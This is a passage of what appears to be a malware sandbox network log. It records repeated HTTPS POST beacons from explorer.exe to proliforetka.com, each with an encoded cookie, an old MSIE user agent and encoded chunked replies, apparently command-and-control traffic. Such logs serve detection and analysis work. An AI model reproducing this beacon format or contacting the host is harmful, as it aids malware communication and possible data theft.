                                                                                                                                25192.168.2.650019172.67.161.604434004C:\Windows\explorer.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-17 16:58:03 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DX3JoJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-17 16:58:03 UTC808INHTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:58:03 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FUqHO%2B64CT12qBCtL3iQekllY9sT0YqY8lEk5s1FqByRFpyfDCkdb6FBfqGWdHq0B5gjR3X6JJjqQl7Ln1sr4Jh7GZUI6P97F2UH1Pn0nBnqDuv9OZBkumu6Doqod01Kf3nQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f3874ab885a718b-FRA
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=91061&min_rtt=91059&rtt_var=34152&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1059&delivery_rate=32059&cwnd=32&unsent_bytes=0&cid=677757c61612e330&ts=716&x=0"
                                                                                                                                2024-12-17 16:58:03 UTC343INData Raw: 31 35 30 0d 0a 6c 31 35 70 4a 4d 46 4e 75 31 66 78 49 4a 4d 37 67 7a 70 43 47 33 7a 4c 68 2b 4e 51 72 6b 43 7a 48 30 4e 57 67 6e 50 5a 41 67 4c 70 35 65 78 44 4f 50 41 52 79 46 6b 50 62 6e 4f 59 4c 6e 42 76 2f 41 2f 58 6a 36 39 44 41 6f 44 45 44 45 54 5a 48 78 6e 72 5a 69 48 2f 35 63 75 5a 66 51 6e 34 59 62 4c 36 4f 76 63 38 75 49 66 50 66 4f 30 36 58 7a 42 63 64 41 7a 77 45 78 58 5a 6c 77 73 54 4d 36 4c 6b 4c 6a 62 76 43 58 4b 37 4e 68 35 4a 74 6a 72 46 63 69 7a 39 54 66 50 6d 44 34 30 6b 56 50 74 54 37 78 4b 58 4d 30 32 63 2b 63 4b 6e 4f 6b 69 6d 4f 4c 52 4b 78 69 43 45 59 76 5a 6e 4d 73 46 45 78 63 65 35 6c 6a 70 51 30 38 66 45 56 65 62 5a 32 61 49 59 6b 43 6a 67 46 4c 48 79 49 36 7a 4f 64 4a 31 76 6b 39 68 69 4a 78 6c 61 6b 6a 72 64 4d 32 38 49 4d 50
                                                                                                                                Data Ascii: 150l15pJMFNu1fxIJM7gzpCG3zLh+NQrkCzH0NWgnPZAgLp5exDOPARyFkPbnOYLnBv/A/Xj69DAoDEDETZHxnrZiH/5cuZfQn4YbL6Ovc8uIfPfO06XzBcdAzwExXZlwsTM6LkLjbvCXK7Nh5JtjrFciz9TfPmD40kVPtT7xKXM02c+cKnOkimOLRKxiCEYvZnMsFExce5ljpQ08fEVebZ2aIYkCjgFLHyI6zOdJ1vk9hiJxlakjrdM28IMP
                                                                                                                                2024-12-17 16:58:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                26192.168.2.650020172.67.161.604434004C:\Windows\explorer.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-17 16:58:05 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DX3J4J2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-17 16:58:06 UTC812INHTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:58:05 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s7APTBgOUX8JK%2BOeSxnZPOpzRluTqZXBqq1egEJ7cktwe6bEkb%2BkvefNUc9e3ruCzvwumtqgtz0xhRCwd9sx7QWysOb6h4KbXZ9r%2FSq35SGfhy8F8jR%2BnrOtDdBQuXNkuDrV"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f3874b98eb0b96f-AMS
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=78351&min_rtt=78330&rtt_var=29389&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1059&delivery_rate=37278&cwnd=32&unsent_bytes=0&cid=6da109c99a1fe511&ts=673&x=0"
                                                                                                                                2024-12-17 16:58:06 UTC343INData Raw: 31 35 30 0d 0a 6e 56 70 73 4a 4d 5a 4b 76 31 66 38 4a 4a 59 77 68 7a 46 47 47 33 2f 4c 68 75 4e 55 71 55 69 7a 47 30 4e 64 68 6e 6a 55 42 77 4c 70 35 65 78 44 4f 50 41 52 79 46 6b 50 62 6e 4f 52 4a 48 68 71 39 51 44 51 6a 36 31 4f 44 6f 54 49 43 51 2b 54 47 52 54 6d 59 43 2f 38 6a 36 65 62 63 51 6a 38 62 50 2f 44 54 4b 39 6b 6f 59 62 2f 48 2b 31 69 56 79 78 59 63 30 61 73 42 6c 36 5a 6c 41 30 47 4f 37 62 67 4f 6e 33 2b 53 48 7a 37 4c 31 52 4f 70 32 61 38 56 78 6a 43 54 50 48 69 42 75 6f 68 4d 2f 4a 53 36 68 61 53 66 6b 7a 54 38 73 6d 74 50 6b 4c 4f 50 74 31 4c 79 43 2b 4c 59 72 4a 5a 52 4a 6b 63 33 4d 61 4a 39 44 6f 4a 32 39 76 41 55 71 79 46 7a 50 31 46 6a 7a 62 6d 48 72 66 6d 4b 61 72 41 59 64 68 74 30 74 59 69 50 6c 4e 64 67 32 61 6b 46 6c 73 79 4e 2f
                                                                                                                                Data Ascii: 150nVpsJMZKv1f8JJYwhzFGG3/LhuNUqUizG0NdhnjUBwLp5exDOPARyFkPbnORJHhq9QDQj61ODoTICQ+TGRTmYC/8j6ebcQj8bP/DTK9koYb/H+1iVyxYc0asBl6ZlA0GO7bgOn3+SHz7L1ROp2a8VxjCTPHiBuohM/JS6haSfkzT8smtPkLOPt1LyC+LYrJZRJkc3MaJ9DoJ29vAUqyFzP1FjzbmHrfmKarAYdht0tYiPlNdg2akFlsyN/
                                                                                                                                2024-12-17 16:58:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                27192.168.2.650021172.67.161.604434004C:\Windows\explorer.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-17 16:58:07 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DX3IIJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-17 16:58:08 UTC807INHTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:58:08 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Bv0xK6vRf4VgOlLKjS9dGsrXZy1vqO5%2BKURfSWJc83Tfo2JzZtjWZXrAhmNlIGE9b12fPoNvXBxPTLLYe3D6qMz8ORf4hsGEXLsDEjJUoPFPK9CFwrDl758rqsXU0elBdD3m"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f3874c62a668c15-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2040&min_rtt=2035&rtt_var=774&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1059&delivery_rate=1403171&cwnd=238&unsent_bytes=0&cid=911cea1941581326&ts=873&x=0"
                                                                                                                                2024-12-17 16:58:08 UTC347INData Raw: 31 35 34 0d 0a 6d 6c 6c 75 4b 4d 70 49 75 6c 66 78 4a 5a 45 36 67 7a 4a 47 47 33 76 4a 68 4f 31 53 72 30 43 7a 47 6b 4e 65 68 6e 62 59 44 41 4c 70 35 65 78 44 4f 50 41 52 79 46 6b 50 62 6e 4f 52 49 58 70 71 38 67 4c 53 6a 36 31 48 44 34 44 4a 44 30 76 5a 45 68 66 71 59 79 72 37 35 38 75 61 66 51 72 2f 59 62 4c 39 4f 76 63 38 75 49 66 50 66 4f 30 36 58 7a 42 63 64 41 7a 77 45 78 58 5a 6c 77 73 54 4d 36 4c 6b 4c 6a 62 76 43 58 4b 37 4e 68 35 4a 74 6a 72 46 63 69 7a 39 52 66 72 69 42 49 4d 6e 4d 70 56 57 36 52 4f 55 4e 55 7a 52 74 73 6d 6e 50 45 2b 6b 4f 74 34 74 77 69 2b 45 62 76 63 6f 51 38 59 62 77 74 6d 6d 75 58 63 64 78 39 76 45 55 65 57 51 7a 4b 4a 48 6b 6a 58 6a 45 62 37 37 50 72 76 66 61 35 63 67 33 74 52 67 5a 55 4a 4c 68 44 32 47 45 57 67 31 4e 66
                                                                                                                                Data Ascii: 154mlluKMpIulfxJZE6gzJGG3vJhO1Sr0CzGkNehnbYDALp5exDOPARyFkPbnORIXpq8gLSj61HD4DJD0vZEhfqYyr758uafQr/YbL9Ovc8uIfPfO06XzBcdAzwExXZlwsTM6LkLjbvCXK7Nh5JtjrFciz9RfriBIMnMpVW6ROUNUzRtsmnPE+kOt4twi+EbvcoQ8YbwtmmuXcdx9vEUeWQzKJHkjXjEb77Prvfa5cg3tRgZUJLhD2GEWg1Nf
                                                                                                                                2024-12-17 16:58:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                28192.168.2.650022172.67.161.604434004C:\Windows\explorer.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-17 16:58:09 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DX3IYJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-17 16:58:10 UTC812INHTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:58:10 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HMNPl2sR3owfR9hjZiSGaNGXq%2BLogPQemyqZKLaAQi67Wk1dBbIVfV%2BOJ6b3jQQ0JSxH12KqFRUPVo%2FIQZ9MgCsvGE2%2B0z38JRlFH5IPgLOLhaAOOwRCI4nmqwfGccEwmaZ3"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f3874d4fdc5b909-AMS
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=77998&min_rtt=77979&rtt_var=29281&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1059&delivery_rate=37370&cwnd=32&unsent_bytes=0&cid=95ad4782b1c319b9&ts=672&x=0"
                                                                                                                                2024-12-17 16:58:10 UTC343INData Raw: 31 35 30 0d 0a 6e 46 78 71 4a 4d 42 46 75 56 66 33 49 70 41 31 67 7a 51 50 55 48 33 4f 68 65 70 52 78 6b 48 62 48 30 6c 64 6a 58 65 51 4f 48 53 6e 6f 2b 70 4f 4c 2b 51 52 30 51 5a 4a 57 30 36 5a 49 58 78 6f 2f 47 6e 51 35 4b 35 48 42 6f 43 4e 43 55 53 53 47 42 58 68 5a 45 62 34 35 4b 43 61 65 77 48 37 4a 59 37 45 45 36 68 36 76 71 6d 7a 55 2f 6c 2b 56 79 68 62 4f 6c 4f 73 54 56 57 52 6d 68 59 56 50 4c 58 33 5a 6a 44 79 53 6a 36 67 50 6b 4a 4a 2f 45 53 37 5a 52 62 50 51 66 72 6c 44 2b 6f 6e 4d 76 70 55 34 52 47 58 66 6b 33 57 38 73 36 72 4f 6b 7a 4f 4d 39 31 48 77 69 6d 4f 4a 73 4e 65 47 35 34 43 77 2b 6e 45 75 53 34 56 32 39 2f 44 47 37 6d 46 6b 2f 39 59 6a 44 50 70 46 36 72 78 4f 4c 58 4b 4c 70 56 68 30 4a 52 35 4c 30 56 61 32 45 53 6a 4b 31 45 7a 4e 66
                                                                                                                                Data Ascii: 150nFxqJMBFuVf3IpA1gzQPUH3OhepRxkHbH0ldjXeQOHSno+pOL+QR0QZJW06ZIXxo/GnQ5K5HBoCNCUSSGBXhZEb45KCaewH7JY7EE6h6vqmzU/l+VyhbOlOsTVWRmhYVPLX3ZjDySj6gPkJJ/ES7ZRbPQfrlD+onMvpU4RGXfk3W8s6rOkzOM91HwimOJsNeG54Cw+nEuS4V29/DG7mFk/9YjDPpF6rxOLXKLpVh0JR5L0Va2ESjK1EzNf
                                                                                                                                2024-12-17 16:58:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                29192.168.2.650023172.67.161.604434004C:\Windows\explorer.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-17 16:58:11 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DX3IoJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-17 16:58:12 UTC811INHTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:58:12 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cBfdIENq%2BXIulfEfCdlDhOC1gh%2BuJ6wnpMfdvaLEh203pt0pmFeumrup0CpU1IGTAoL8y2c%2F0zXj3H1CrM7HKlPI300ZbdD6Eef27Yci%2FSNYB1jLMRBBZDOxnHaoHjTutLYx"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f3874e0d9f442b7-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1624&min_rtt=1607&rtt_var=638&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1059&delivery_rate=1668571&cwnd=212&unsent_bytes=0&cid=85279fc8d67e1117&ts=761&x=0"
                                                                                                                                2024-12-17 16:58:12 UTC347INData Raw: 31 35 34 0d 0a 6e 46 6c 6f 4a 4d 42 4f 75 31 66 38 4a 5a 59 30 68 6a 74 4b 47 33 44 4d 67 75 35 58 6f 45 43 7a 46 45 4e 65 67 6e 44 64 44 51 4c 70 35 65 78 44 4f 50 41 52 79 46 6b 50 62 6e 4f 53 4a 58 68 74 39 51 4c 52 6a 36 78 43 42 49 62 48 42 30 54 5a 48 42 62 68 59 53 7a 38 35 73 75 5a 63 51 6e 36 62 72 50 2f 4f 76 63 38 75 49 66 50 66 4f 30 36 58 7a 42 63 64 41 7a 77 45 78 58 5a 6c 77 73 54 4d 36 4c 6b 4c 6a 62 76 43 58 4b 37 4e 68 35 4a 74 6a 72 46 63 69 7a 39 51 50 48 6d 42 6f 77 6a 50 35 56 53 37 42 43 57 4f 6b 72 53 74 73 4f 6d 4f 45 71 6a 4d 74 73 74 78 69 47 45 59 2f 68 74 65 62 42 44 6d 73 43 6e 69 52 55 64 6e 74 50 59 56 65 4c 61 6b 4c 63 59 7a 79 72 39 46 37 54 39 4b 72 48 5a 5a 59 4a 6c 33 4a 56 75 4a 56 73 42 67 79 7a 61 61 45 30 50 44 2f
                                                                                                                                Data Ascii: 154nFloJMBOu1f8JZY0hjtKG3DMgu5XoECzFENegnDdDQLp5exDOPARyFkPbnOSJXht9QLRj6xCBIbHB0TZHBbhYSz85suZcQn6brP/Ovc8uIfPfO06XzBcdAzwExXZlwsTM6LkLjbvCXK7Nh5JtjrFciz9QPHmBowjP5VS7BCWOkrStsOmOEqjMtstxiGEY/htebBDmsCniRUdntPYVeLakLcYzyr9F7T9KrHZZYJl3JVuJVsBgyzaaE0PD/
                                                                                                                                2024-12-17 16:58:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                30192.168.2.650024172.67.161.604434004C:\Windows\explorer.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-17 16:58:13 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DX3I4J2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-17 16:58:14 UTC814INHTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:58:14 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ptD%2Bnr3edjWxLQwlhsjO8AMOjuCDlK0zglxIlB3V28UoV6Cd8enf64LYA%2FrcAd%2FryPCN1oyWVRycwwUx2VafyaPRpk6NOfJlQZUmXEMqUr5KfhvmmU4zTEcGCIIG0ug%2B3CCu"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f3874edfedc42c6-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=20963&min_rtt=1666&rtt_var=12178&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1059&delivery_rate=1752701&cwnd=149&unsent_bytes=0&cid=446493a96a177ef1&ts=789&x=0"
                                                                                                                                2024-12-17 16:58:14 UTC343INData Raw: 31 35 30 0d 0a 6d 56 78 70 4a 63 64 4f 76 31 66 77 4c 4a 77 78 67 33 39 45 55 6e 72 4b 67 2b 70 56 78 6b 33 5a 46 55 64 61 68 44 33 68 50 7a 32 6f 71 75 35 64 4b 4f 4d 50 6b 41 46 37 56 45 69 53 4a 58 74 70 6d 67 58 65 36 4b 74 41 41 6f 61 4e 44 45 53 55 47 42 66 68 59 30 62 34 34 71 61 62 65 41 7a 2f 4a 59 37 45 45 36 68 36 76 71 6d 7a 55 2f 6c 2b 56 79 68 62 4f 6c 4f 73 54 56 57 52 6d 68 59 56 50 4c 58 33 5a 6a 44 79 53 6a 36 67 50 6b 4a 4a 2f 45 53 37 62 78 66 43 51 76 72 67 41 2b 6f 70 4d 2f 35 54 36 42 57 51 66 6b 76 5a 2f 38 2b 71 50 6b 33 4f 4f 4e 68 43 79 53 6d 4a 62 4c 4a 5a 52 4a 6b 63 33 4d 61 4a 39 44 6f 4a 32 39 76 41 55 71 79 46 7a 50 31 46 6a 7a 62 6d 48 72 66 6d 4b 61 72 41 59 64 68 74 30 74 59 69 50 6c 4e 64 67 32 61 6b 46 6c 6f 37 4d 2f
                                                                                                                                Data Ascii: 150mVxpJcdOv1fwLJwxg39EUnrKg+pVxk3ZFUdahD3hPz2oqu5dKOMPkAF7VEiSJXtpmgXe6KtAAoaNDESUGBfhY0b44qabeAz/JY7EE6h6vqmzU/l+VyhbOlOsTVWRmhYVPLX3ZjDySj6gPkJJ/ES7bxfCQvrgA+opM/5T6BWQfkvZ/8+qPk3OONhCySmJbLJZRJkc3MaJ9DoJ29vAUqyFzP1FjzbmHrfmKarAYdht0tYiPlNdg2akFlo7M/
                                                                                                                                2024-12-17 16:58:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                31192.168.2.650025172.67.161.604434004C:\Windows\explorer.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-17 16:58:16 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DX3LIJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-17 16:58:17 UTC821INHTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:58:17 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ekle5Gw5cn2I%2BxAK5EYLcis%2FWT%2FB6xx2IsOoQVWzYnBvkSrENljDJZFp27CQQrUZG9fXEbvATDQJAHjSB%2FXqAJBWj4mVc%2FT9ey4t9%2F3fiBxp%2BCy0%2Fu6oM7ZPCYolDXYCfqBk"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f3874ff2a32d141-CDG
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=81213&min_rtt=81213&rtt_var=30456&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1059&delivery_rate=35952&cwnd=32&unsent_bytes=0&cid=9d61e8e18f328b5a&ts=1187&x=0"
                                                                                                                                2024-12-17 16:58:17 UTC343INData Raw: 31 35 30 0d 0a 6e 46 6c 76 4a 73 5a 49 31 54 2f 7a 49 5a 55 79 68 7a 6f 50 58 6e 2f 4e 68 65 35 58 72 43 66 61 46 55 46 65 6a 48 44 65 53 58 50 75 72 4f 4e 4b 50 4f 4d 57 7a 30 64 4f 61 55 75 5a 49 48 78 67 39 41 43 34 36 61 39 41 42 59 76 48 42 67 2b 53 45 78 44 6a 59 43 48 2b 6a 36 79 62 63 41 72 34 62 37 47 79 53 2f 42 6a 76 35 6e 51 55 36 46 32 53 79 78 63 63 41 2b 35 42 68 57 53 6e 41 4d 64 4b 4c 48 6a 4c 53 47 7a 52 48 36 35 64 45 56 59 6f 44 32 65 55 43 76 50 54 50 62 68 42 49 63 70 56 50 4a 63 34 52 4f 62 4d 55 79 63 2b 4d 4f 75 50 30 2b 6a 4d 72 52 47 78 69 71 4b 62 66 59 6f 51 38 59 62 77 74 6d 6d 75 58 63 64 78 39 76 45 55 65 57 51 7a 4b 4a 48 6b 6a 58 6a 45 62 37 37 50 72 76 66 61 35 63 67 33 74 52 67 5a 55 4a 4c 68 44 32 47 45 57 67 77 4d 50
                                                                                                                                Data Ascii: 150nFlvJsZI1T/zIZUyhzoPXn/Nhe5XrCfaFUFejHDeSXPurONKPOMWz0dOaUuZIHxg9AC46a9ABYvHBg+SExDjYCH+j6ybcAr4b7GyS/Bjv5nQU6F2SyxccA+5BhWSnAMdKLHjLSGzRH65dEVYoD2eUCvPTPbhBIcpVPJc4RObMUyc+MOuP0+jMrRGxiqKbfYoQ8YbwtmmuXcdx9vEUeWQzKJHkjXjEb77Prvfa5cg3tRgZUJLhD2GEWgwMP
                                                                                                                                2024-12-17 16:58:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                32192.168.2.650026172.67.161.604434004C:\Windows\explorer.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-17 16:58:18 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
